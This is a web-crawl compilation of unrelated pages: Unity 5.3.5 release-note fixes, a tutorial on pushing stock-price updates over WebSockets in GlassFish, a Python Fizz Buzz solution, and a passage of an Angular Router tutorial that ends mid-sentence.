socket could be reported as being in an error state when it should have been reported as being in a write state. (759488) - IL2CPP: Generate C++ code to properly handle circular references for field types in unsafe C# code. (780472) - IL2CPP: Generate proper C++ code for a C# class with the StructLayout attribute when its base class does not have a StructLayout attribute. (767367) - IL2CPP: Generate proper C++ code for a method that is marked as both an internal call and a runtime call. (781439) - IL2CPP: Generate proper C++ code for the OnSerialize method injected by UNET in classes deriving from NetworkProximityChecker. (786499) - IL2CPP: Generate proper C++ code for the p/invoke wrapper for a delegate that accepts another delegate as an output parameter. (778146) - IL2CPP: Generated proper C++ code for assemblies compiled with Visual Studio when a method returning an IntPtr returns an integer value. (787687) - IL2CPP: Improved message for PathTooLongException being encountered in IL2CPP. (717343) - IL2CPP: Increased maximum heap size. - IL2CPP: Now correctly return the remote end point from a UDP socket receive call in an IPv6 network. (767741) - IL2CPP: Now generate proper code for COM marshaling of a struct that contains a field of type object array. (781921) - IL2CPP: Prevent a compile error in the generated C++ code due to a missing header when we generic exception type is used in a catch statement. (776087) - IL2CPP: Properly handle numeric conversion from an unsigned integer to floating point types in some edge cases. (780659) - IL2CPP: Properly handle type casts and check for value type arrays when they are casted to generic collection interfaces. (782653) - IL2CPP: Support proper default marshaling of string parameters and return values when the CharSet attribute is provided on a method with a value of Unicode. (692653) - IL2CPP: Throw informative exception when MonoPInvokeCallback delegate type is incompatible with target method signature. (732438) - Input: Input.mousePosition is no longer clamped to the client area on windows standalone, the last position is kept instead. (769666) - iOS: Added Xcode 7.3 Build & Run support. - iOS: Allow IPv6 to work on iOS with the .NET 2.0 profile. (730146) - iOS: Allow third party plugins that use PLCrashReporter library. (768572) - iOS: Apple Pencil pressure will now be exposed the same way 3D Touch pressure already is. - iOS: Do not export non-prefixed freetype2 symbols now. (778668) - iOS: Ensure asset bundles are not flagged for iCloud backup by default upon download. (771597) - iOS: Ensure that our symbols are not overridden by user libraries. (774685) - iOS: Fixed a crash when playing a scene in the Editor with an iOS device attached as a Unity Remote. (771132) - iOS: Fixed GLES error 0x0506 and various graphics corruption when using WebCam textures. (763342) - iOS: Fixed incompatible pointer cast warning in trampoline. (776105) - iOS: Fixed memory leak when using On Demand Resources. (776528) - iOS: Fixed support for non-native resolutions in GLES 2. (779738) - iOS: Fixed the incorrect ABI for int64 types on iOS. (774544) - iOS: Fixed UnityWebRequest hanging on responses > 64k when using a custom DownloadHandlerScript. (780329) - iOS: Made Social.ShowLeaderboardUI to show the leaderboards tab, instead of achievements tab. (777596) - iOS: Pause application on GameCenter dialogs on tvOS. (767633) - iOS: Switching between different input fields will not leave input accessory fields on screen. (775710) - iOS: TouchInputModule and StandaloneInputModule will now handle all touch phases preventing unwanted module switches. (764054) - iOS/IL2CPP: Prevent unnecessary changes to the timestamps of the libil2cpp headers during a build. This allows incremental builds to work correctly in Xcode. - iOS/tvOS: AdSupport is now removed from Default Frameworks and needs to be explicitly selected under Framework Dependencies in Platform Settings if required. (732878) - iOS/tvOS: Fixed a regression which caused artefacts when using GLES2 Graphics API. (785036) - JsonUtility: Fixed EditorJsonUtility throwing MissingMethodException (769085) - Linux: Don't query displays when running in nographics mode. - Linux: Exit with nice message instead of crashing when GPU/driver doesn't meet minimum requirements. (777564, 783842) - Linux: Fixed a crash when stereoscopic mode is requested on non-stereoscopic display. (784075) - Linux: Fixed an occasional crash when creating texture properties. - Mac Editor: Added functionality in order to prevent the processing of folders that contain the ".unity" extension, as this was causing the editor to crash when executing in batch mode. (761639) - MacDownloadAssistant: Fixed window focus issue after security prompt. - Mac Editor: Fixed UI text rendering on Radeon HD 4000 series and older AMD GPUs. (783713) - Mac Editor: Application.version now returns the application's version. It no longer returns Application.unityVersion. (764054) - MemoryProfiler: Added toggle to exclude references in detailed memory dump to reduce memory footprint used. (783527) - Mono: Fixed GC related test instability in OSX Editor. (777945) - Mono: Make the Personal folder be the same on all profiles. (776268) - Networking: Fixed issue with SyncList change callback where the old value was given there instead of the updated one. (774970) - Networking: Fixed problem when transferring data via reliable sequenced QoS channel could lose messages in "bad" network conditions. (781177) - Networking: Fixed problem where HostTopology.MessagePoolSizeGrowthFactor was ignored. (773411) - Networking: Fixed WebGL client unable to free connections in NetworkServer when using WebSocket. (768030) - OpenGL: Fixed a bunch of compute shader structured buffer access corner case issues. (767348) - OpenGL: Fixed invalid shader code generation when using gl_PrimitiveID or bitFieldInsert(). - OpenGL: Fixed mislocated fragment shader default float precision. Now also basing the default precision on actual GPU capabilities. (763638) - OpenGL: Fixed multiple simultaneous append/consume compute buffers usage. - OpenGL: Fixed rendering when Graphics.Blit is being called after WaitForEndOfFrame. (784880) - OpenGL: Shader compiler, added unused global uniform pruning. - OpenGL: Shader compiler, avoid temporary variable name collisions. (780831) - OpenGL: Shader compiler, fixed shader translation bugs. (782514) - OpenGL/ES: Fixed GPU profiler on Android for Tegra 2/3/4 devices. (776539) - Particles: Do not restart simulation when becoming visible, and use bigger timesteps, to reduce performance spikes. (765905) - Particles: Fixed a case where if OnWillRenderObject renders, it breaks the main scene. (773226) - Particles: Fixed a crash caused when using Inherit Velocity Module. (783433) - Particles: Fixed a crash when material is missing and mesh colors are requested. (774931) - Particles: Fixed a crash when using SubEmitters with separate rotation axes. (757377) - Particles: Fixed an issue where the Material Property Blocks not working with mesh particles. (776143) - Particles: Fixed batching issues when using multiple cameras in the same position. (788023) - Particles: Fixed culling when using SetParticles. (496494) - Physics: Cloth deletes MeshRenderer component when entering playmode fixed. (769137) - Physics: Disabling cloth component doesn't seem to really disable it fixed. (669622) - Physics: Ensure that OnTriggerExit2D is not called when changing Rigidbody2D.isKinematic property. - Physics: Fix for Collision2D.relativeVelocity being reported with incorrect values. (758422) - Physics: Fixed an issue for 2D collider: line & ray casting not detecting initial overlapped state. - Physics: Fixed an issue with Box2D changes slowing the editor down when lots of changes are made without entering play-mode. (777591) - Physics: Fixed cloth issue where adding cloth to an object throws GetLocalizedString error. (769136) - Physics: Provide feedback to allow working around crashes occurring when input meshes contain invalid vertices. (766891) - Physics2D: Fix to ensure that changing a Collider2D property via the inspector doesn't reset the OnCollision or OnTrigger state back to 'Enter'. (786032) - Physics2D: Fixed a problem where both AreaEffector2D and PointEffector2D scaled-up forces for each additional collider on a rigidbody. (780257) - Physics2D: Fixed a problem where constantly changing an Effector2D collider would mean that no contacts were ever processed stopping the effector from working. - Prefabs: Implemented OnWillSaveAssets callback when applying prefabs. (754351) - Profiler: Fixed a crash when adding data from thread which was started during a frame. (758264) - Resources: Enable warnings for and prevent crashes and memory corruptions when non-assets, or non-unloadable assets are tried to be unloaded through Resources.UnloadAsset in release builds. (767120) - Samsung TV: Enabled a "Show Unity Splash Screen" check box on Samsung TV's PlayerSettings. - Samsung TV: Fixed multiple crashes on the NT14U TV that would prevent games from launching. - SpeedTree: Fixed "GetLocalizedString is not allowed to be called" error message when using the Tree Editor. (779965) - Terrain: Fixed crash when exiting Editor after creating TerrainData with HideAndDontSave flag. (780365) - Tizen: Fixed issue deploying after upgrading to the Tizen 2.4rev4 SDK. (743653) - tvOS: Enabled game controller in tvOS on-screen keyboard. (776446) - tvOS: Fixed a bug that caused splash screen properties being not applied. (775008) - tvOS: Fixed a crash when calling OnDemandResourcesRequest.Dispose() in a coroutine. - tvOS: Fixed build targeting tvOS 9.2 with Xcode 7.3 beta. (770115) - tvOS: Separated tvOS SDK and OS version settings from iOS. (749311) - UI: Fix for child UI elements not being rendered when scaling World Space Canvas from zero. (768807) - UI: Fixed ArgumentOutOfRange exception sometimes being thrown when editing InputField on mobile. (762080) - UI: Fixed dropdown destroy coroutine being started when the component is not active. (758873) - UI: Fixed issue with crash due to dirty renderer being in the dirty list after being destroyed. (764711) - UI: Fixed issue with double rendering of canvas on Vive VR. - UI: Fixed object culling when unparenting from a mask type. (740604) - UI: Fixed Selectable not handling when the EventSystem is null. (788037) - UI: Fixed setting Input Field text when in Decimal/Integer with invalid values. - UI: Setting Input field text through script will now be validated. - UnityWebRequest: Downgrade to HTTP GET on 302 and 303 redirect codes (751798) - UnityWebRequest: Honor negative redirectLimit. (751794) - UWP: Build & Run will correctly work with Universal Windows 10 Apps. (771326) - UWP: Screen.currentResolution will return desktop resolution when application is in windowed mode. (771541) - VisualStudio: Fixed a crash that could sometimes happen when opening Visual Studio. - VR: Fixed an issue with incorrect Render Texture size being used. Most notable with deferred rendering. - VR: VRFocus now respects RunInBackground. Run In Background value of true will now disable rendering if VRFocus is lost. - WebGL: Fixed SimpleWebServer bug causing 'Uncaught incorrect header check'. (770266) - Wii U: Added crash fixes, memory efficiency and 16-bit texture support. - Wii U: Fixed issues causing known crashes. - Windows: SystemInfo.deviceModel will now report model name and manufacturer. (784466) - Windows Standalone: P/Invoke will work correctly with native libraries which reference other native libraries, if those libraries are located in the same directory. (776918) - Windows Store: Assembly-CSharp-firstpass will no longer reference itself. (775216) - Windows Store: Correctly generate Visual Studio namespace when product name contains ' symbol. an underscore will be used instead. (754102) - Windows Store: Disable Generate C# option when scripting backend is set to il2cpp. (775344) - Windows Store: Files located in Assets\Resources won't end up in generated Assembly-CSharp-firstpass project, but will be correctly placed in Assembly-CSharp project. - Windows Store: Fixed $(OutDir) and $(IntDir) paths for generated IL2CPP Visual Studio solutions which prevented appx bundles to build correctly. - Windows Store: Fixed a rare crash at startup related to serialization on debug mode. (778905) - Windows Store: Fixed an assert happening during mesh compression. - Windows Store: Fixed an exception while marshalling UnityEngine.NavMeshTriangulation. - Windows Store: Fixed an issue with populating visual assets (tiles, logos, etc.) to Visual Studio solution (correct file names, manifest entries) and check format consistency (JPEG vs PNG). (775592, 775624, 777575, 777580) - Windows Store: Fixed Build & Run for Universal 8.1 solution. (789538) - Windows Store: Fixed generics related AssemblyConverter failure and give better error messages. (762780) - Windows Store: Fixed incorrect orientation of extended splash screen on Windows Phone 8.1. (770092) - Windows Store: Fixed marshaling of UnityEngine.HumanDescription, previously the field hasTranslationDoF was not mashaled at all. - Windows Store: Fixed marshaling of UnityEngine.SplatPrototype, previously fields specularMetallic, smoothness were not marshaled, because of this sometimes terrain would be rendered incorrectly. (786889) - Windows Store: Fixed Screen.orientation returning AutoRotation on startup. (787522) - Windows Store: Fixed stacktraces on IL2CPP scripting backend. (781907) - Windows Store: Fixed Tab key duplication in XAML controls when Unity input is enabled. (775931) - Windows Store: Fixed return result, previously it would return only an error code, now it will also contain error message returned by the server. - Windows Store: Having many generic types in the project no longer makes .NET Native compiler run out of memory. - Windows Store: Help SerializationWeaver find references which have Windows SDK specified when building to Universal 8.1. (781994) - Windows Store: Hindi characters will show up correctly, Nirmala UI from Windows fonts will be used. (779136) - Windows Store: Package.appxmanifest for Universal Windows 10 Apps will be produced correctly when protocol for association launching is specified. (780971) - Windows Store: RuntimeInitializeOnLoadMethod will work correctly. (777878) - Windows Store: Screen.SetResolution will correctly work on Windows Phone 10. (773877) - Windows Store: Slightly fix generated Assembly-CSharp* projects to fix "System.BadImageFormatException: Duplicate type with name 'UnityEngine.Internal.$FieldNamesStorage' .. " (781935) - Windows Store: EventType.ScrollWheel is now properly detected. (784975) - Windows Store: The maximum amount of characters for short name for tiles will be 40 now. (789439) - Windows Store/IL2CPP: Allow the MapFileParser utility to handle input and output files with paths containing non-ASCII characters. (779968) - Windows Store/IL2CPP: Fixed a crash on windows when using asynchronous socket APIs (.BeginSend/.BeginReceive/etc). (771883) - Windows: Fixed standalone Windows player position when bigger than primary monitor. (760215) - WindowsDownloadAssistant: Fixed setting VisualStudio 2015 as Unity script editor. - WindowsDownloadAssistant: Fixed the bug which was freezing installation UI during bad network connection. (732955) Revision: 960ebf59018a Changeset: 960ebf59018a Unity 5.3.5
https://unity3d.com/ru/unity/whats-new/unity-5.3.5
CC-MAIN-2021-04
en
refinedweb
, in this tutorial from February’s JAX Magazine. WebSockets are new in HTML5 and provide the capability to establish a full duplex connection between the web server and the web browser. This means for the first time we can write applications to push updates to the browser directly from the server without having to use complex hacks like long polling, Comet or third party plugins like Flash. In this tutorial I’ll demonstrate pushing stock “updates” to a browser over Websockets to asynchronously update a stock price graph purely using the push capabilities inherent in Websockets. I’ll also use GlassFish in this tutorial as this has out of the box Websockets support in the latest production GlassFish 3.1.2.2 and can therefore be built and deployed now. However WebSocket support is not enabled out of the box. WebSocket support can be enabled via the administration console, but the simplest way is to use an asadmin command; asadmin set configs.config.server-config.network-config.protocols.protocol.http-listener-1.http.websockets-support-enabled=true To keep things short, in this tutorial, our application will just spawn a thread to create random updates to the Stock price. However in a real application, it would be simple to hook our application to a data feed via JMS or some other mechanism. Side bar? The Java API for Websockets is being standardised in the JCP under JSR 356. Currently application servers use a proprietary api to unlock Websockets functionality and the GlassFish api here is specific to GlassFish. Tomcat and other servers have a different API. If you are interested in the proposed JEE7 Websockets API head over to the JCP page to take a look. Websocket is supported in GlassFish thanks to the Grizzly library. The key classes in the Grizzly Websocket API we need are shown in Figure 1. Figure 1: Key classes in the Grizzly Websocket API StockSocket class Working from the bottom up, first we must create a derived class of the Grizzly WebSocket class. This class will implement the protocol between the browser and GlassFish. As we’ll see later one instance of this class is created for each client browser. In our class, we will implement Runnable, spawn a Thread and send updates to the browser. In this code (shown in Listing 1), we will take advantage of the Grizzly provided DefaultWebSocket class. This implements all the methods of the WebSocket interface with no-ops, so we can just override the methods we are interested in. Listing 1 public class StockSocket extends DefaultWebSocket implements Runnable { private Thread myThread; private boolean connected = false; public StockSocket(ProtocolHandler protocolHandler, WebSocketListener... listeners) { super(protocolHandler, listeners); In the onConnect method (which is called when a client browser connects to the server) we need to create a new Thread and pass the Websocket instance as the Runnable, as shown in Listing 2. Listing 2: onConnect @Override public void onConnect() { myThread = new Thread(this); connected = true; myThread.start(); super.onConnect(); } In the run method (Listing 3), we will periodically call our custom sendUpdate method using a random value for a Stock. Our Stock class is a simple Serializable POJO DTO with three attributes, name, description and price. Listing 3: Run public void run() { while(connected) { Stock stock = new Stock("C2B2","C2B2",Math.random() * 100.0); int sleepTime = (int)(500*Math.random() + 500); Thread.currentThread().sleep(sleepTime); sendUpdate(stock); } } In the sendUpdate method (Listing 4), we serialize the Stock object using the Jackson library into a JSON string. We then send this to the browser over WebSockets by calling the Grizzly base class’ send method which writes the JSON string down to the browser. Listing 4: sendUpdate public void sendUpdate(Stock stock) { // CONVERT to JSON ObjectMapper mapper = new ObjectMapper(); StringWriter writer = new StringWriter(); try { mapper.writeValue(writer, stock); } catch (IOException ex) { } String jsonStr = writer.toString(); // SEND down the Websocket send(jsonStr); } Finally in our onClose method (Listing 5) we will notify the thread to stop by setting connected to false. Listing 5: onClose @Override public void onClose(DataFrame frame) { connected = false; super.onClose(frame); } } StockApplication class To hook our derived StockSocket class into the GlassFish server, we need to create a derived WebsocketApplication class, shown below; public class StockApplication extends WebSocketApplication { In this class there are two methods we need to override. The first is isApplicationRequest which is called by GlassFish when a client browser connects to GlassFish over the Websocket protocol (Listing 6). Our application needs to check the request and decide whether it wants to accept the connection. In this case, we will check whether the context path of the Websocket request contains the string “/stocks”. If so we need to tell GlassFish that the request is for us by returning true. Listing 6:isApplicationRequest @Override public boolean isApplicationRequest(Request request) { if (request.requestURI().toString().endsWith("/stocks")) { return true; } else { return false; } } The second method is createWebSocket (Listing 7). Here, we need to create and return an instance of our StockSocket class described above. The createWebSocket method is called by GlassFish when a client browser connects to our application and we have accepted the request. Listing 7: createWebSocket @Override public WebSocket createWebSocket(ProtocolHandler protocolHandler, WebSocketListener... listeners) { return new StockSocket(protocolHandler, listeners); } StockServlet Class The final class we need to write is a simple servlet. This servlet only exists to ensure we register our derived StockApplication class with Grizzly’s WebSocketEngine. Listing 8: StockServlet @WebServlet(name = "StockServlet", urlPatterns = { "/stocks" }, loadOnStartup = 1) public class StockServlet extends HttpServlet { private StockApplication pushApp; We do this in the init method of our servlet and to ensure our servlet is created on deployment, we must specify that an instance should be created on startup, in the annotations as shown above. @Override public void init(ServletConfig config) throws ServletException { super.init(config); pushApp = new StockApplication(); WebSocketEngine.getEngine().register(pushApp); } We also need to override the destroy method to ensure our StockApplication is unregistered from the WebSocketEngine on undeployment. @Override public void destroy() { super.destroy(); WebSocketEngine.getEngine().unregister(pushApp); } } HTML5 & Javascript Once we have written our Java servlet and the classes to use Grizzly’s WebSocket API, we need to turn our mind to the HTML and Javascript code. For our demonstration we are going to use a Javascript library called Highcharts which is free for non-commercial use. This Javascript library can render very sexy Charts purely by using HTML5. For our browser we will create a simple JSP page which uses the Websocket Javascript API to connect to GlassFish over the Websocket protocol and then receives our JSON stock updates which it feeds to HighCharts to graph. The first thing you need to do in the WebSockets Javascript API is to connect to the GlassFish server, using the Websocket protocol. To do this, we need to create a URL of the form ws://<host>:<port>/<context> and pass this to the constructor of the WebSocket class. <script type=”text/javascript”> var wsUri = “ws://” + location.host + “${pageContext.request.contextPath}/stocks”; websocket = new WebSocket(wsUri); Once we have our Websocket object, we then must set up the call back functions. These Javascript functions are called by the browser when Websocket events occur, for example, when the socket is opened (onOpen), closed (onClose) or there is an error (onError). For simplicity, we will set these as empty functions. websocket.onopen = function(event) { }; websocket.onclose = function(event) { }; websocket.onerror = function(event) { }; The most important callback is onmessage. This is triggered when the browser receives data from the server over the Websocket, and in our case will be called when we receive the JSON string representing the stock object. So we will parse the JSON string and create a new datapoint in HighCharts for this Stock price update. websocket.onmessage = function(event) { var object = JSON.parse(event.data); var x = (new Date()).getTime(); var y = object.price; document.chart.series[0].addPoint([x,y],true,true,false); } </script> The initialisation of the HighCharts chart is done in the head of the document, a snippet of which is shown below. Listing 9: HighCharts <script type="text/javascript"> $(document).ready(function() { Highcharts.setOptions({ global: { useUTC: false } }); var chart; document.chart = new Highcharts.Chart({ … }); </script> The JSP page should be packaged up into a war file, with the servlet and Java Grizzly code shown above and deployed to your GlassFish server in the usual way. Final View Once the code is deployed successfully, you can navigate to it using your usual browser and you should see an updating chart. Figure 2: Updating Chart Building push applications using the standard WebSocket Javascript API and modern application servers like GlassFish is very easy to do. Hopefully this tutorial has whetted your appetite and inspired you to explore WebSockets in your applications. Steve Millidge is the director and founder of C2B2 Consulting Limited, he has used Java extensively since pre1.0 and has been a field based professional service consultant for over 10 systems. Steve has spoken at a number of events including Java One, Jax London, UK Oracle User Group Conference, The Server SOA, Cloud & Service Technology Symposium, JBoss World; he is the main organiser of the London JBoss User Group and regularly presents brown bag technical sessions for C2B2’s customer base. This article first appeared in JAX Magazine: Socket to them! in February 2013. Download that issue and others here.
https://jaxenter.com/tutorial-pushing-browser-updates-using-websockets-in-glassfish-105970.html
CC-MAIN-2021-04
en
refinedweb
First solution in Clear category for Fizz Buzz by CyprianSzlachciak #Your optional code here #You can import some modules or create additional functions def checkio(number): #Your code here if number%3==0 and number%5==0: number = "Fizz Buzz" elif number%3==0: number = "Fizz" elif number%5==0: number = "Buzz" #It's main function. Don't remove this function #It's using for auto-testing and must return a result for check. #replace this for solution return str(number) #raw_input(x) #print checkio(x) . 16, 2016 Forum Price Global Activity ClassRoom Manager Leaderboard Coding games Python programming for beginners
https://py.checkio.org/mission/fizz-buzz/publications/CyprianSzlachciak/python-3/first/share/fed44292856b5b38c1a023e2a7af44ac/
CC-MAIN-2021-04
en
refinedweb
Oracle HSM - Filesystem Metadata Usage Is Very High When Using ssum (Doc ID 2198333.1) Last updated on FEBRUARY 21, 2019 Applies to:Oracle Hierarchical Storage Manager (HSM) and StorageTek QFS Software - Version 6.1 and later Information in this document applies to any platform. Symptoms When using 'ssum' for all (or a significant amount) of the files on a filesystem, the customer may notice that their meta data space is consumed more than typical and some file system utilities may take longer to run. Changes Changes in 6.1 for the storing of the 'message-digest' (checksum) have been put in the meta data section. For each file that has an extended attribute defined which is used to store the checksum, a 'hidden' directory namespace is created. Within this namespace, a message-digest file is created to store the checksum. This adds additional inode allocations to the 'regular' file (one for the directory and one for the file) in the meta data portion of the file system. For more information on extended attributes see the 'man runat' and also 'man -s5 fsattr' commands. The extended attributes are a Solaris construct and O-HSM uses this to associate a message-digest file to the 'regular' file. Cause In this Document
https://support.oracle.com/knowledge/Sun%20Microsystems/2198333_1.html
CC-MAIN-2021-04
en
refinedweb
An Introduction to Component Routing with Angular Router Free JavaScript Book! Write powerful, clean and maintainable JavaScript. RRP $11.95 5 — Add authentication to protect private content - Part 6 — How to Update Angular Projects to the latest version.: the state of the router at some point in time, expressed as a tree of activated route snapshots - activated route snapshot: provides access to the URL, parameters, and data for a router state node - guard: script that runs when a route is loaded, activated or deactivated - resolver: script that fetches data before the requested page is activated - router outlet: location in the DOM where Angular Router can place activated components.. Enabling Routing To enable routing in our Angular application, we need to do three things: - create a routing configuration that defines the possible states for our application - import the routing configuration into our application - add a router outlet to tell Angular Router where to place the activated components in the DOM. So let’s start by creating a routing configuration. Creating the routing configuration To create our routing configuration, we need a list of the URLs we’d like our application to support. Currently, our application is very simple and only has one page that shows a list of todos: /: show list of todos which would show the list of todos as the home page of our application. However, when a user bookmarks / in their browser to consult their list of todos and we change the contents of our home page (which we’ll do in part 5 of this series), their bookmark would no longer show their list of todos. So let’s give our todo list its own URL and redirect our home page to it: /: redirect to /todos /todos: show list of todos. This provides us with two benefits: - when users bookmark the todos page, their browser will bookmark /todosinstead of /, which will keep working as expected, even if we change the home page contents - we can now easily change our home page by redirecting it to any URL we like, which is convenient if you need to change your homepage contents regularly. The official Angular style guide recommends storing the routing configuration for an Angular module in a file with a filename ending in -routing.module.ts that exports a separate Angular module with a name ending in RoutingModule. Our current module is called AppModule, so we create a file src/app/app-routing.module.ts and export our routing configuration as an Angular module called AppRoutingModule: import { NgModule } from '@angular/core'; import { RouterModule, Routes } from '@angular/router'; import { AppComponent } from './app.component'; const routes: Routes = [ { path: '', redirectTo: 'todos', pathMatch: 'full' }, { path: 'todos', component: AppComponent } ]; @NgModule({ imports: [RouterModule.forRoot(routes)], exports: [RouterModule], providers: [] }) export class AppRoutingModule { } First we import RouterModule and Routes from @angular/router: import { RouterModule, Routes } from '@angular/router'; Next, we define a variable routes of type Routes and assign it our router configuration: const routes: Routes = [ { path: '', redirectTo: 'todos', pathMatch: 'full' }, { path: 'todos', component: AppComponent } ]; The Routes type is optional and lets an IDE with TypeScript support or the TypeScript compiler conveniently validate your route configuration during development. The router configuration represents all possible router states our application can be in. It is a tree of routes, defined as a JavaScript array, where each route can have the following properties: - path: string, path to match the URL - pathMatch: string, how to match the URL - component: class reference, component to activate when this route is activated - redirectTo: string, URL to redirect to when this route is activated - data: static data to assign to route - resolve: dynamic data to resolve and merge with data when resolved - children: child routes. Our application is simple and only contains two sibling routes, but a larger application could have a router configuration with child routes such as: const routes: Routes = [ { path: '', redirectTo: 'todos', pathMatch: 'full' }, { path: 'todos', children: [ { path: '', component: 'TodosPageComponent' }, { path: ':id', component: 'TodoPageComponent' } ] } ]; Here, todos has two child routes and :id is a route parameter, enabling the router to recognize the following URLs: /: home page, redirect to /todos /todos: activate TodosPageComponentand show list of todos /todos/1: activate TodoPageComponentand set value of :idparameter to 1 /todos/2: activate TodoPageComponentand set value of :idparameter to 2. Notice how we specify pathMatch: 'full' when defining the redirect. Angular Router has two matching strategies: - prefix: default, matches when the URL starts with the value of path - full: matches when the URL equals the value of path. We can create the following route: // no pathMatch specified, so Angular Router applies // the default `prefix` pathMatch { path: '', redirectTo: 'todos' } In this case, Angular Router applies the default prefix path matching strategy and every URL is redirected to todos because every URL starts with the empty string '' specified in path. We only want our home page to be redirected to todos , so we add pathMatch: 'full' to make sure that only the URL that equals the empty string '' is matched: { path: '', redirectTo: 'todos', pathMatch: 'full' } To learn more about the different routing configuration options, check out the official Angular documentation on Routing and Navigation. Finally, we create and export an Angular module AppRoutingModule: @NgModule({ imports: [RouterModule.forRoot(routes)], exports: [RouterModule], providers: [] }) export class AppRoutingModule { } There are two ways to create a routing module: RouterModule.forRoot(routes): creates a routing module that includes the router directives, the route configuration and the router service RouterModule.forChild(routes): creates a routing module that includes the router directives, the route configuration but not the router service. The RouterModule.forChild() method is needed when your application has multiple routing modules. Remember that the router service takes care of synchronization between our application state and the browser URL. Instantiating multiple router services that interact with the same browser URL would lead to issues, so it is essential that there’s only one instance of the router service in our application, no matter how many routing modules we import in our application. When we import a routing module that is created using RouterModule.forRoot(), Angular will instantiate the router service. When we import a routing module that’s created using RouterModule.forChild(), Angular will not instantiate the router service. Therefore we can only use RouterModule.forRoot() once and use RouterModule.forChild() multiple times for additional routing modules. Because our application only has one routing module, we use RouterModule.forRoot(): imports: [RouterModule.forRoot(routes)] In addition, we also specify RouterModule in the exports property: exports: [RouterModule] This ensures that we don’t have to explicitly import RouterModule again in AppModule when AppModule imports AppRoutingModule. Now that we have our AppRoutingModule, we need to import it in our AppModule to enable it. Importing the routing configuration To import our routing configuration into our application, we must import AppRoutingModule into our main AppModule. Let’s open up src/app/app.module.ts and add AppRoutingModule to the imports array in AppModule’s @NgModule metadata: import { BrowserModule } from '@angular/platform-browser'; import { NgModule } from '@angular/core'; import { FormsModule } from '@angular/forms'; import { HttpModule } from '@angular/http'; import { AppComponent } from './app.component'; import { TodoListComponent } from './todo-list/todo-list.component'; import { TodoListFooterComponent } from './todo-list-footer/todo-list-footer.component'; import { TodoListHeaderComponent } from './todo-list-header/todo-list-header.component'; import { TodoDataService } from './todo-data.service'; import { TodoListItemComponent } from './todo-list-item/todo-list-item.component'; import { ApiService } from './api.service'; import { AppRoutingModule } from './app-routing.module'; @NgModule({ declarations: [ AppComponent, TodoListComponent, TodoListFooterComponent, TodoListHeaderComponent, TodoListItemComponent ], imports: [ AppRoutingModule, BrowserModule, FormsModule, HttpModule ], providers: [TodoDataService, ApiService], bootstrap: [AppComponent] }) export class AppModule { } Because AppRoutingModule has RoutingModule listed in its exports property, Angular will import RoutingModule automatically when we import AppRoutingModule, so we don’t have to explicitly import RouterModule again (although doing so would not cause any harm). Before we can try out our changes in the browser, we need to complete the third and final step. Adding a router outlet Although our application now has a routing configuration, we still need to tell Angular Router where it can place the instantiated components in the DOM. When our application is bootstrapped, Angular instantiates AppComponent because AppComponent is listed in the bootstrap property of AppModule: @NgModule({ // ... bootstrap: [AppComponent] }) export class AppModule { } To tell Angular Router where it can place components, we must add the <router-outlet></router-outlet> element to AppComponent’s HTML template. The <router-outlet></router-outlet> element tells Angular Router where it can instantiate components in the DOM. If you’re familiar AngularJS 1.x router and UI-Router, you can consider <router-outlet></router-outlet> the Angular alternative to ng-view and ui-view. Without a <router-outlet></router-outlet> element, Angular Router would not know where to place the components and only AppComponent’s own HTML would be rendered. AppComponent currently displays a list of todos. But instead of letting AppComponent display a list of todos, we now want AppComponent to contain a <router-outlet></router-outlet> and tell Angular Router to instantiate another component inside AppComponent to display the list of todos. To accomplish that, let’s generate a new component TodosComponent using Angular CLI: $ ng generate component Todos Let’s also move all HTML from src/app/app.component.html to src/app/todos/todos.component.html: <!-- src/app/todos/todos.component.html --> <section class="todoapp"> <app-todo-list-header (add)="onAddTodo($event)" ></app-todo-list-header> <app-todo-list [todos]="todos" (toggleComplete)="onToggleTodoComplete($event)" (remove)="onRemoveTodo($event)" ></app-todo-list> <app-todo-list-footer [todos]="todos" ></app-todo-list-footer> </section> Let’s also move all logic from src/app/app.component.ts to src/app/todos/todos.component.ts: /* src/app/todos/todos.component.ts */ import { Component, OnInit } from '@angular/core'; import { TodoDataService } from '../todo-data.service'; import { Todo } from '../todo'; @Component({ selector: 'app-todos', templateUrl: './todos.component.html', styleUrls: ['./todos.component.css'], providers: [TodoDataService] }) export class TodosComponent implements OnInit { todos: Todo[] = []; constructor( private todoDataService: TodoDataService ) { } public ngOnInit() { this.todoDataService .getAllTodos() .subscribe( (todos) => { this.todos = todos; } ); } onAddTodo(todo) { this.todoDataService .addTodo(todo) .subscribe( (newTodo) => { this.todos = this.todos.concat(newTodo); } ); } onToggleTodoComplete(todo) { this.todoDataService .toggleTodoComplete(todo) .subscribe( (updatedTodo) => { todo = updatedTodo; } ); } onRemoveTodo(todo) { this.todoDataService .deleteTodoById(todo.id) .subscribe( (_) => { this.todos = this.todos.filter((t) => t.id !== todo.id); } ); } } Now we can replace AppComponent’s template in src/app/app.component.html with: <router-outlet></router-outlet> We can also remove all obsolete code from AppComponent’s class in src/app/app.component.ts: import { Component } from '@angular/core'; @Component({ selector: 'app-root', templateUrl: './app.component.html', styleUrls: ['./app.component.css'], }) export class AppComponent { } Finally, we update our todos route in src/app/app-routing.module.ts to instantiate TodosComponent instead of AppComponent: const routes: Routes = [ { path: '', redirectTo: 'todos', pathMatch: 'full' }, { path: 'todos', component: TodosComponent } ]; Now, when our application is bootstrapped, Angular instantiates AppComponent and finds a <router-outlet></router-outlet> where Angular Router can instantiate and activate components. Let’s try out our changes in the browser. Start your development server and your back-end API by running: $ ng serve $ npm run json-server Then navigate your browser to. Angular Router reads the router configuration and automatically redirects our browser to. If you inspect the elements on the page, you’ll see that the TodosComponent is not rendered inside <router-outlet></router-outlet>, but right next to it: <app-root> <!-- Angular Router finds router outlet --> <router-outlet></router-outlet> <!-- and places the component right next to it, NOT inside it --> <app-todos></app-todos> </app-root> Our application now has routing enabled. Awesome! Adding a wildcard route When you navigate your browser to, and you open up your browser’s developer tools, you will notice that Angular Router logs the following error to the console: Error: Cannot match any routes. URL Segment: 'unmatched-url' To handle unmatched URLs gracefully we need to do two things: - Create PageNotFoundComponent(you can name it differently if you like) to display a friendly message that the requested page could not be found - Tell Angular Router to show the PageNotFoundComponentwhen no route matches the requested URL. Let’s start by generating PageNotFoundComponent using Angular CLI: $ ng generate component PageNotFound Then edit its template in src/app/page-not-found/page-not-found.component.html: <p>We are sorry, the requested page could not be found.</p> Next, we add a wildcard route using ** as a path: const routes: Routes = [ { path: '', redirectTo: 'todos', pathMatch: 'full' }, { path: 'todos', component: AppComponent }, { path: '**', component: PageNotFoundComponent } ]; The ** matches any URL, including child paths. Now, if you navigate your 